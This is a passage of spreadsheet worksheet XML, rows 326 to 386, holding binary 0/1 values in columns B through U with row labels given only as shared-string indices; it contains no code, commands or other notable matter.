        <v>0</v>
      </c>
      <c r="U326" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="327" spans="1:21">
      <c r="A327" s="7" t="s">
        <v>330</v>
      </c>
      <c r="B327" s="1">
        <v>1</v>
      </c>
      <c r="C327" s="12">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U327" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="328" spans="1:21" ht="60">
      <c r="A328" s="7" t="s">
        <v>331</v>
      </c>
      <c r="B328" s="1">
        <v>0</v>
      </c>
      <c r="C328" s="12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1</v>
      </c>
      <c r="M328" s="1">
        <v>1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7">
        <v>0</v>
      </c>
      <c r="U328" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="329" spans="1:21">
      <c r="A329" s="7" t="s">
        <v>332</v>
      </c>
      <c r="B329" s="1">
        <v>0</v>
      </c>
      <c r="C329" s="12">
        <v>0</v>
      </c>
      <c r="D329" s="9">
        <v>0</v>
      </c>
      <c r="E329" s="9">
        <v>1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1</v>
      </c>
      <c r="M329" s="1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7">
        <v>0</v>
      </c>
      <c r="U329" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="330" spans="1:21">
      <c r="A330" s="7" t="s">
        <v>333</v>
      </c>
      <c r="B330" s="1">
        <v>1</v>
      </c>
      <c r="C330" s="12">
        <v>0</v>
      </c>
      <c r="D330" s="9">
        <v>0</v>
      </c>
      <c r="E330" s="9">
        <v>0</v>
      </c>
      <c r="F330" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U330" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="331" spans="1:21" ht="24">
      <c r="A331" s="7" t="s">
        <v>334</v>
      </c>
      <c r="B331" s="1">
        <v>1</v>
      </c>
      <c r="C331" s="12">
        <v>0</v>
      </c>
      <c r="D331" s="9">
        <v>0</v>
      </c>
      <c r="E331" s="9">
        <v>0</v>
      </c>
      <c r="F331" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U331" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="332" spans="1:21" ht="36">
      <c r="A332" s="7" t="s">
        <v>335</v>
      </c>
      <c r="B332" s="1">
        <v>1</v>
      </c>
      <c r="C332" s="12">
        <v>1</v>
      </c>
      <c r="D332" s="9">
        <v>0</v>
      </c>
      <c r="E332" s="9">
        <v>1</v>
      </c>
      <c r="F332" s="9">
        <v>0</v>
      </c>
      <c r="G332" s="9">
        <v>0</v>
      </c>
      <c r="H332" s="9">
        <v>1</v>
      </c>
      <c r="I332" s="9">
        <v>0</v>
      </c>
      <c r="J332" s="9">
        <v>0</v>
      </c>
      <c r="K332" s="9">
        <v>0</v>
      </c>
      <c r="L332" s="9">
        <v>0</v>
      </c>
      <c r="M332" s="1">
        <v>0</v>
      </c>
      <c r="N332" s="12">
        <v>0</v>
      </c>
      <c r="O332" s="12">
        <v>0</v>
      </c>
      <c r="P332" s="12">
        <v>0</v>
      </c>
      <c r="Q332" s="12">
        <v>1</v>
      </c>
      <c r="R332" s="12">
        <v>0</v>
      </c>
      <c r="S332" s="12">
        <v>0</v>
      </c>
      <c r="T332" s="17">
        <v>0</v>
      </c>
      <c r="U332" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="333" spans="1:21">
      <c r="A333" s="7" t="s">
        <v>336</v>
      </c>
      <c r="B333" s="1">
        <v>0</v>
      </c>
      <c r="C333" s="12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1</v>
      </c>
      <c r="L333" s="9">
        <v>0</v>
      </c>
      <c r="M333" s="1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7">
        <v>0</v>
      </c>
      <c r="U333" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="334" spans="1:21" ht="24">
      <c r="A334" s="7" t="s">
        <v>337</v>
      </c>
      <c r="B334" s="1">
        <v>1</v>
      </c>
      <c r="C334" s="12">
        <v>0</v>
      </c>
      <c r="D334" s="9">
        <v>0</v>
      </c>
      <c r="E334" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U334" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="335" spans="1:21">
      <c r="A335" s="7" t="s">
        <v>338</v>
      </c>
      <c r="B335" s="1">
        <v>1</v>
      </c>
      <c r="C335" s="12">
        <v>0</v>
      </c>
      <c r="D335" s="9">
        <v>0</v>
      </c>
      <c r="E335" s="9">
        <v>0</v>
      </c>
      <c r="F335" s="9">
        <v>1</v>
      </c>
      <c r="G335" s="9">
        <v>0</v>
      </c>
      <c r="H335" s="9">
        <v>1</v>
      </c>
      <c r="I335" s="9">
        <v>0</v>
      </c>
      <c r="J335" s="9">
        <v>0</v>
      </c>
      <c r="K335" s="9">
        <v>0</v>
      </c>
      <c r="L335" s="9">
        <v>0</v>
      </c>
      <c r="M335" s="1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7">
        <v>0</v>
      </c>
      <c r="U335" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="336" spans="1:21">
      <c r="A336" s="7" t="s">
        <v>339</v>
      </c>
      <c r="B336" s="1">
        <v>1</v>
      </c>
      <c r="C336" s="12">
        <v>0</v>
      </c>
      <c r="D336" s="9">
        <v>0</v>
      </c>
      <c r="E336" s="9">
        <v>0</v>
      </c>
      <c r="F336" s="9">
        <v>1</v>
      </c>
      <c r="G336" s="9">
        <v>0</v>
      </c>
      <c r="H336" s="9">
        <v>1</v>
      </c>
      <c r="I336" s="9">
        <v>0</v>
      </c>
      <c r="J336" s="9">
        <v>0</v>
      </c>
      <c r="K336" s="9">
        <v>0</v>
      </c>
      <c r="L336" s="9">
        <v>0</v>
      </c>
      <c r="M336" s="1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7">
        <v>0</v>
      </c>
      <c r="U336" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="337" spans="1:21">
      <c r="A337" s="7" t="s">
        <v>340</v>
      </c>
      <c r="B337" s="1">
        <v>1</v>
      </c>
      <c r="C337" s="12">
        <v>0</v>
      </c>
      <c r="D337" s="9">
        <v>0</v>
      </c>
      <c r="E337" s="9">
        <v>0</v>
      </c>
      <c r="F337" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U337" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="338" spans="1:21" ht="36">
      <c r="A338" s="7" t="s">
        <v>341</v>
      </c>
      <c r="B338" s="1">
        <v>1</v>
      </c>
      <c r="C338" s="12">
        <v>0</v>
      </c>
      <c r="D338" s="9">
        <v>0</v>
      </c>
      <c r="E338" s="9">
        <v>0</v>
      </c>
      <c r="F338" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U338" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="339" spans="1:21" ht="24">
      <c r="A339" s="7" t="s">
        <v>342</v>
      </c>
      <c r="B339" s="1">
        <v>0</v>
      </c>
      <c r="C339" s="12">
        <v>0</v>
      </c>
      <c r="D339" s="9">
        <v>0</v>
      </c>
      <c r="E339" s="9">
        <v>0</v>
      </c>
      <c r="F339" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U339" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="340" spans="1:21">
      <c r="A340" s="7" t="s">
        <v>343</v>
      </c>
      <c r="B340" s="1">
        <v>1</v>
      </c>
      <c r="C340" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U340" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="341" spans="1:21" ht="24">
      <c r="A341" s="7" t="s">
        <v>344</v>
      </c>
      <c r="B341" s="1">
        <v>1</v>
      </c>
      <c r="C341" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U341" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="342" spans="1:21">
      <c r="A342" s="7" t="s">
        <v>345</v>
      </c>
      <c r="B342" s="1">
        <v>1</v>
      </c>
      <c r="C342" s="12">
        <v>1</v>
      </c>
      <c r="D342" s="9">
        <v>0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1">
        <v>0</v>
      </c>
      <c r="N342" s="12">
        <v>0</v>
      </c>
      <c r="O342" s="12">
        <v>1</v>
      </c>
      <c r="P342" s="12">
        <v>0</v>
      </c>
      <c r="Q342" s="12">
        <v>0</v>
      </c>
      <c r="R342" s="12">
        <v>0</v>
      </c>
      <c r="S342" s="12">
        <v>0</v>
      </c>
      <c r="T342" s="17">
        <v>0</v>
      </c>
      <c r="U342" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="343" spans="1:21" ht="24">
      <c r="A343" s="7" t="s">
        <v>346</v>
      </c>
      <c r="B343" s="1">
        <v>1</v>
      </c>
      <c r="C343" s="12">
        <v>0</v>
      </c>
      <c r="D343" s="9">
        <v>0</v>
      </c>
      <c r="E343" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U343" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="344" spans="1:21" ht="24">
      <c r="A344" s="7" t="s">
        <v>347</v>
      </c>
      <c r="B344" s="1">
        <v>1</v>
      </c>
      <c r="C344" s="12">
        <v>1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1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1</v>
      </c>
      <c r="S344" s="12">
        <v>0</v>
      </c>
      <c r="T344" s="17">
        <v>0</v>
      </c>
      <c r="U344" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="345" spans="1:21" ht="24">
      <c r="A345" s="7" t="s">
        <v>348</v>
      </c>
      <c r="B345" s="1">
        <v>1</v>
      </c>
      <c r="C345" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U345" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="346" spans="1:21">
      <c r="A346" s="7" t="s">
        <v>349</v>
      </c>
      <c r="B346" s="1">
        <v>0</v>
      </c>
      <c r="C346" s="12">
        <v>0</v>
      </c>
      <c r="D346" s="9">
        <v>0</v>
      </c>
      <c r="E346" s="9">
        <v>1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1</v>
      </c>
      <c r="L346" s="9">
        <v>0</v>
      </c>
      <c r="M346" s="1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7">
        <v>0</v>
      </c>
      <c r="U346" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="347" spans="1:21" ht="24">
      <c r="A347" s="7" t="s">
        <v>350</v>
      </c>
      <c r="B347" s="1">
        <v>1</v>
      </c>
      <c r="C347" s="12">
        <v>1</v>
      </c>
      <c r="D347" s="9">
        <v>0</v>
      </c>
      <c r="E347" s="9">
        <v>1</v>
      </c>
      <c r="F347" s="9">
        <v>0</v>
      </c>
      <c r="G347" s="9">
        <v>0</v>
      </c>
      <c r="H347" s="9">
        <v>1</v>
      </c>
      <c r="I347" s="9">
        <v>0</v>
      </c>
      <c r="J347" s="9">
        <v>0</v>
      </c>
      <c r="K347" s="9">
        <v>0</v>
      </c>
      <c r="L347" s="9">
        <v>0</v>
      </c>
      <c r="M347" s="1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1</v>
      </c>
      <c r="T347" s="17">
        <v>0</v>
      </c>
      <c r="U347" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="348" spans="1:21" ht="24">
      <c r="A348" s="7" t="s">
        <v>351</v>
      </c>
      <c r="B348" s="1">
        <v>1</v>
      </c>
      <c r="C348" s="12">
        <v>0</v>
      </c>
      <c r="D348" s="9">
        <v>0</v>
      </c>
      <c r="E348" s="9">
        <v>0</v>
      </c>
      <c r="F348" s="9">
        <v>0</v>
      </c>
      <c r="G348" s="9">
        <v>0</v>
      </c>
      <c r="H348" s="9">
        <v>1</v>
      </c>
      <c r="I348" s="9">
        <v>0</v>
      </c>
      <c r="J348" s="9">
        <v>0</v>
      </c>
      <c r="K348" s="9">
        <v>0</v>
      </c>
      <c r="L348" s="9">
        <v>0</v>
      </c>
      <c r="M348" s="1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7">
        <v>0</v>
      </c>
      <c r="U348" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="349" spans="1:21">
      <c r="A349" s="7" t="s">
        <v>352</v>
      </c>
      <c r="B349" s="1">
        <v>0</v>
      </c>
      <c r="C349" s="12">
        <v>0</v>
      </c>
      <c r="D349" s="9">
        <v>0</v>
      </c>
      <c r="E349" s="9">
        <v>1</v>
      </c>
      <c r="F349" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U349" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="350" spans="1:21" ht="24">
      <c r="A350" s="7" t="s">
        <v>353</v>
      </c>
      <c r="B350" s="1">
        <v>0</v>
      </c>
      <c r="C350" s="12">
        <v>1</v>
      </c>
      <c r="D350" s="9">
        <v>0</v>
      </c>
      <c r="E350" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U350" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="351" spans="1:21" ht="24">
      <c r="A351" s="7" t="s">
        <v>354</v>
      </c>
      <c r="B351" s="1">
        <v>1</v>
      </c>
      <c r="C351" s="12">
        <v>1</v>
      </c>
      <c r="D351" s="9">
        <v>0</v>
      </c>
      <c r="E351" s="9">
        <v>0</v>
      </c>
      <c r="F351" s="9">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N351" s="12">
        <v>0</v>
      </c>
      <c r="O351" s="12">
        <v>0</v>
      </c>
      <c r="P351" s="12">
        <v>0</v>
      </c>
      <c r="Q351" s="12">
        <v>1</v>
      </c>
      <c r="R351" s="12">
        <v>0</v>
      </c>
      <c r="S351" s="12">
        <v>0</v>
      </c>
      <c r="T351" s="17">
        <v>0</v>
      </c>
      <c r="U351" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="352" spans="1:21">
      <c r="A352" s="7" t="s">
        <v>355</v>
      </c>
      <c r="B352" s="1">
        <v>1</v>
      </c>
      <c r="C352" s="12">
        <v>0</v>
      </c>
      <c r="D352" s="9">
        <v>0</v>
      </c>
      <c r="E352" s="9">
        <v>0</v>
      </c>
      <c r="F352" s="9">
        <v>1</v>
      </c>
      <c r="G352" s="9">
        <v>0</v>
      </c>
      <c r="H352" s="9">
        <v>1</v>
      </c>
      <c r="I352" s="9">
        <v>0</v>
      </c>
      <c r="J352" s="9">
        <v>0</v>
      </c>
      <c r="K352" s="9">
        <v>0</v>
      </c>
      <c r="L352" s="9">
        <v>0</v>
      </c>
      <c r="M352" s="1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7">
        <v>0</v>
      </c>
      <c r="U352" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="353" spans="1:21" ht="24">
      <c r="A353" s="7" t="s">
        <v>356</v>
      </c>
      <c r="B353" s="1">
        <v>1</v>
      </c>
      <c r="C353" s="12">
        <v>1</v>
      </c>
      <c r="D353" s="9">
        <v>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0</v>
      </c>
      <c r="L353" s="9">
        <v>0</v>
      </c>
      <c r="M353" s="1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1</v>
      </c>
      <c r="T353" s="17">
        <v>0</v>
      </c>
      <c r="U353" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="354" spans="1:21">
      <c r="A354" s="7" t="s">
        <v>357</v>
      </c>
      <c r="B354" s="1">
        <v>0</v>
      </c>
      <c r="C354" s="12">
        <v>0</v>
      </c>
      <c r="D354" s="9">
        <v>0</v>
      </c>
      <c r="E354" s="9">
        <v>0</v>
      </c>
      <c r="F354" s="9">
        <v>1</v>
      </c>
      <c r="G354" s="9">
        <v>0</v>
      </c>
      <c r="H354" s="9">
        <v>0</v>
      </c>
      <c r="I354" s="9">
        <v>1</v>
      </c>
      <c r="J354" s="9">
        <v>0</v>
      </c>
      <c r="K354" s="9">
        <v>0</v>
      </c>
      <c r="L354" s="9">
        <v>0</v>
      </c>
      <c r="M354" s="1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7">
        <v>0</v>
      </c>
      <c r="U354" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="355" spans="1:21" ht="24">
      <c r="A355" s="7" t="s">
        <v>358</v>
      </c>
      <c r="B355" s="1">
        <v>1</v>
      </c>
      <c r="C355" s="12">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U355" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="356" spans="1:21" ht="24">
      <c r="A356" s="7" t="s">
        <v>359</v>
      </c>
      <c r="B356" s="1">
        <v>1</v>
      </c>
      <c r="C356" s="12">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N356" s="12">
        <v>0</v>
      </c>
      <c r="O356" s="12">
        <v>1</v>
      </c>
      <c r="P356" s="12">
        <v>0</v>
      </c>
      <c r="Q356" s="12">
        <v>0</v>
      </c>
      <c r="R356" s="12">
        <v>0</v>
      </c>
      <c r="S356" s="12">
        <v>0</v>
      </c>
      <c r="T356" s="17">
        <v>0</v>
      </c>
      <c r="U356" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="357" spans="1:21" ht="24">
      <c r="A357" s="7" t="s">
        <v>360</v>
      </c>
      <c r="B357" s="1">
        <v>1</v>
      </c>
      <c r="C357" s="12">
        <v>1</v>
      </c>
      <c r="D357" s="9">
        <v>0</v>
      </c>
      <c r="E357" s="9">
        <v>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1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7">
        <v>1</v>
      </c>
      <c r="U357" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="358" spans="1:21" ht="24">
      <c r="A358" s="7" t="s">
        <v>361</v>
      </c>
      <c r="B358" s="1">
        <v>1</v>
      </c>
      <c r="C358" s="12">
        <v>1</v>
      </c>
      <c r="D358" s="9">
        <v>0</v>
      </c>
      <c r="E358" s="9">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N358" s="12">
        <v>0</v>
      </c>
      <c r="O358" s="12">
        <v>0</v>
      </c>
      <c r="P358" s="12">
        <v>1</v>
      </c>
      <c r="Q358" s="12">
        <v>0</v>
      </c>
      <c r="R358" s="12">
        <v>0</v>
      </c>
      <c r="S358" s="12">
        <v>0</v>
      </c>
      <c r="T358" s="17">
        <v>0</v>
      </c>
      <c r="U358" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="359" spans="1:21">
      <c r="A359" s="7" t="s">
        <v>362</v>
      </c>
      <c r="B359" s="1">
        <v>0</v>
      </c>
      <c r="C359" s="12">
        <v>0</v>
      </c>
      <c r="D359" s="9">
        <v>0</v>
      </c>
      <c r="E359" s="9">
        <v>1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1</v>
      </c>
      <c r="M359" s="1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7">
        <v>0</v>
      </c>
      <c r="U359" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="360" spans="1:21">
      <c r="A360" s="7" t="s">
        <v>363</v>
      </c>
      <c r="B360" s="1">
        <v>0</v>
      </c>
      <c r="C360" s="12">
        <v>0</v>
      </c>
      <c r="D360" s="9">
        <v>0</v>
      </c>
      <c r="E360" s="9">
        <v>1</v>
      </c>
      <c r="F360" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U360" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="361" spans="1:21" ht="24">
      <c r="A361" s="7" t="s">
        <v>364</v>
      </c>
      <c r="B361" s="1">
        <v>1</v>
      </c>
      <c r="C361" s="12">
        <v>0</v>
      </c>
      <c r="D361" s="9">
        <v>0</v>
      </c>
      <c r="E361" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U361" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="362" spans="1:21" ht="24">
      <c r="A362" s="7" t="s">
        <v>365</v>
      </c>
      <c r="B362" s="1">
        <v>1</v>
      </c>
      <c r="C362" s="12">
        <v>1</v>
      </c>
      <c r="D362" s="9">
        <v>0</v>
      </c>
      <c r="E362" s="9">
        <v>1</v>
      </c>
      <c r="F362" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U362" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="363" spans="1:21">
      <c r="A363" s="7" t="s">
        <v>366</v>
      </c>
      <c r="B363" s="1">
        <v>1</v>
      </c>
      <c r="C363" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U363" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="364" spans="1:21">
      <c r="A364" s="7" t="s">
        <v>367</v>
      </c>
      <c r="B364" s="1">
        <v>0</v>
      </c>
      <c r="C364" s="12">
        <v>0</v>
      </c>
      <c r="D364" s="9">
        <v>1</v>
      </c>
      <c r="E364" s="9">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U364" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="365" spans="1:21" ht="24">
      <c r="A365" s="7" t="s">
        <v>368</v>
      </c>
      <c r="B365" s="1">
        <v>1</v>
      </c>
      <c r="C365" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U365" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="366" spans="1:21">
      <c r="A366" s="7" t="s">
        <v>369</v>
      </c>
      <c r="B366" s="1">
        <v>1</v>
      </c>
      <c r="C366" s="12">
        <v>1</v>
      </c>
      <c r="D366" s="9">
        <v>0</v>
      </c>
      <c r="E366" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U366" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="367" spans="1:21" ht="24">
      <c r="A367" s="7" t="s">
        <v>370</v>
      </c>
      <c r="B367" s="1">
        <v>1</v>
      </c>
      <c r="C367" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U367" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="368" spans="1:21" ht="24">
      <c r="A368" s="7" t="s">
        <v>371</v>
      </c>
      <c r="B368" s="1">
        <v>1</v>
      </c>
      <c r="C368" s="12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1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7">
        <v>1</v>
      </c>
      <c r="U368" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="369" spans="1:21">
      <c r="A369" s="7" t="s">
        <v>372</v>
      </c>
      <c r="B369" s="1">
        <v>1</v>
      </c>
      <c r="C369" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U369" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="370" spans="1:21" ht="24">
      <c r="A370" s="7" t="s">
        <v>373</v>
      </c>
      <c r="B370" s="1">
        <v>1</v>
      </c>
      <c r="C370" s="12">
        <v>0</v>
      </c>
      <c r="D370" s="9">
        <v>0</v>
      </c>
      <c r="E370" s="9">
        <v>0</v>
      </c>
      <c r="F370" s="9">
        <v>1</v>
      </c>
      <c r="G370" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U370" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="371" spans="1:21" ht="24">
      <c r="A371" s="7" t="s">
        <v>374</v>
      </c>
      <c r="B371" s="1">
        <v>1</v>
      </c>
      <c r="C371" s="12">
        <v>0</v>
      </c>
      <c r="D371" s="9">
        <v>0</v>
      </c>
      <c r="E371" s="9">
        <v>0</v>
      </c>
      <c r="F371" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U371" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="372" spans="1:21" ht="24">
      <c r="A372" s="7" t="s">
        <v>375</v>
      </c>
      <c r="B372" s="1">
        <v>0</v>
      </c>
      <c r="C372" s="12">
        <v>0</v>
      </c>
      <c r="D372" s="9">
        <v>0</v>
      </c>
      <c r="E372" s="9">
        <v>1</v>
      </c>
      <c r="F372" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U372" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="373" spans="1:21" ht="24">
      <c r="A373" s="7" t="s">
        <v>376</v>
      </c>
      <c r="B373" s="1">
        <v>1</v>
      </c>
      <c r="C373" s="12">
        <v>1</v>
      </c>
      <c r="D373" s="9">
        <v>0</v>
      </c>
      <c r="E373" s="9">
        <v>1</v>
      </c>
      <c r="F373" s="9">
        <v>0</v>
      </c>
      <c r="G373" s="9">
        <v>0</v>
      </c>
      <c r="H373" s="9">
        <v>1</v>
      </c>
      <c r="I373" s="9">
        <v>0</v>
      </c>
      <c r="J373" s="9">
        <v>0</v>
      </c>
      <c r="K373" s="9">
        <v>0</v>
      </c>
      <c r="L373" s="9">
        <v>0</v>
      </c>
      <c r="M373" s="1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1</v>
      </c>
      <c r="T373" s="17">
        <v>0</v>
      </c>
      <c r="U373" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="374" spans="1:21">
      <c r="A374" s="7" t="s">
        <v>377</v>
      </c>
      <c r="B374" s="1">
        <v>0</v>
      </c>
      <c r="C374" s="12">
        <v>0</v>
      </c>
      <c r="D374" s="9">
        <v>0</v>
      </c>
      <c r="E374" s="9">
        <v>0</v>
      </c>
      <c r="F374" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U374" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="375" spans="1:21">
      <c r="A375" s="7" t="s">
        <v>378</v>
      </c>
      <c r="B375" s="1">
        <v>0</v>
      </c>
      <c r="C375" s="12">
        <v>0</v>
      </c>
      <c r="D375" s="9">
        <v>0</v>
      </c>
      <c r="E375" s="9">
        <v>0</v>
      </c>
      <c r="F375" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U375" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="376" spans="1:21">
      <c r="A376" s="7" t="s">
        <v>379</v>
      </c>
      <c r="B376" s="1">
        <v>1</v>
      </c>
      <c r="C376" s="12">
        <v>0</v>
      </c>
      <c r="D376" s="9">
        <v>0</v>
      </c>
      <c r="E376" s="9">
        <v>0</v>
      </c>
      <c r="F376" s="9">
        <v>1</v>
      </c>
      <c r="G376" s="9">
        <v>0</v>
      </c>
      <c r="H376" s="9">
        <v>0</v>
      </c>
      <c r="I376" s="9">
        <v>0</v>
      </c>
      <c r="J376" s="9">
        <v>1</v>
      </c>
      <c r="K376" s="9">
        <v>0</v>
      </c>
      <c r="L376" s="9">
        <v>0</v>
      </c>
      <c r="M376" s="1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7">
        <v>0</v>
      </c>
      <c r="U376" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="377" spans="1:21">
      <c r="A377" s="7" t="s">
        <v>380</v>
      </c>
      <c r="B377" s="1">
        <v>0</v>
      </c>
      <c r="C377" s="12">
        <v>0</v>
      </c>
      <c r="D377" s="9">
        <v>0</v>
      </c>
      <c r="E377" s="9">
        <v>1</v>
      </c>
      <c r="F377" s="9">
        <v>1</v>
      </c>
      <c r="G377" s="9">
        <v>0</v>
      </c>
      <c r="H377" s="9">
        <v>0</v>
      </c>
      <c r="I377" s="9">
        <v>1</v>
      </c>
      <c r="J377" s="9">
        <v>0</v>
      </c>
      <c r="K377" s="9">
        <v>0</v>
      </c>
      <c r="L377" s="9">
        <v>0</v>
      </c>
      <c r="M377" s="1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7">
        <v>0</v>
      </c>
      <c r="U377" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="378" spans="1:21">
      <c r="A378" s="7" t="s">
        <v>381</v>
      </c>
      <c r="B378" s="1">
        <v>1</v>
      </c>
      <c r="C378" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U378" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="379" spans="1:21">
      <c r="A379" s="7" t="s">
        <v>382</v>
      </c>
      <c r="B379" s="1">
        <v>0</v>
      </c>
      <c r="C379" s="12">
        <v>0</v>
      </c>
      <c r="D379" s="9">
        <v>1</v>
      </c>
      <c r="E379" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U379" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="380" spans="1:21">
      <c r="A380" s="7" t="s">
        <v>383</v>
      </c>
      <c r="B380" s="1">
        <v>0</v>
      </c>
      <c r="C380" s="12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1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7">
        <v>0</v>
      </c>
      <c r="U380" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="381" spans="1:21" ht="24">
      <c r="A381" s="7" t="s">
        <v>384</v>
      </c>
      <c r="B381" s="1">
        <v>1</v>
      </c>
      <c r="C381" s="12">
        <v>0</v>
      </c>
      <c r="D381" s="9">
        <v>0</v>
      </c>
      <c r="E381" s="9">
        <v>1</v>
      </c>
      <c r="F381" s="9">
        <v>1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1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7">
        <v>1</v>
      </c>
      <c r="U381" s="1">
        <v>1</v>
      </c>
    </row>
    <row r="382" spans="1:21" ht="24">
      <c r="A382" s="7" t="s">
        <v>385</v>
      </c>
      <c r="B382" s="1">
        <v>1</v>
      </c>
      <c r="C382" s="12">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U382" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="383" spans="1:21" ht="24">
      <c r="A383" s="7" t="s">
        <v>386</v>
      </c>
      <c r="B383" s="1">
        <v>0</v>
      </c>
      <c r="C383" s="12">
        <v>1</v>
      </c>
      <c r="D383" s="9">
        <v>0</v>
      </c>
      <c r="E383" s="9">
        <v>1</v>
      </c>
      <c r="F383" s="9">
        <v>1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1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7">
        <v>0</v>
      </c>
      <c r="U383" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="384" spans="1:21" ht="24">
      <c r="A384" s="7" t="s">
        <v>387</v>
      </c>
      <c r="B384" s="1">
        <v>1</v>
      </c>
      <c r="C384" s="12">
        <v>0</v>
      </c>
      <c r="D384" s="9">
        <v>0</v>
      </c>
      <c r="E384" s="9">
        <v>0</v>
      </c>
      <c r="F384" s="9">
        <v>0</v>
      </c>
      <c r="G384" s="9">
        <v>0</v>
      </c>
      <c r="H384" s="9">
        <v>1</v>
      </c>
      <c r="I384" s="9">
        <v>0</v>
      </c>
      <c r="J384" s="9">
        <v>0</v>
      </c>
      <c r="K384" s="9">
        <v>0</v>
      </c>
      <c r="L384" s="9">
        <v>0</v>
      </c>
      <c r="M384" s="1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7">
        <v>0</v>
      </c>
      <c r="U384" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="385" spans="1:21" ht="24">
      <c r="A385" s="7" t="s">
        <v>388</v>
      </c>
      <c r="B385" s="1">
        <v>1</v>
      </c>
      <c r="C385" s="12">
        <v>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1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7">
        <v>0</v>
      </c>
      <c r="U385" s="1">
        <v>0</v>
      </c>
    </row>
    <row r="386" spans="1:21" ht="36">
      <c r="A386" s="7" t="s">
        <v>389</v>
      </c>
      <c r="B386" s="1">
        <v>1</v>
      </c>
      <c r="C386" s="12">
        <v>1</v>
      </c>
      <c r="D386" s="9">
        <v>0</v>
      </c>
      <c r="E386" s="9">
        <v>0</v>
      </c>
      <c r="F386" s="9">
        <v>1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1">
        <v>0</v>
      </c>
      <c r="N386" s="12">
        <v>0</v>
      </c>
      <c r="O386" s="12">
        <v>0</v>
      </c>
      <c r="P386" s="12">
        <v>0</v>
      </c>
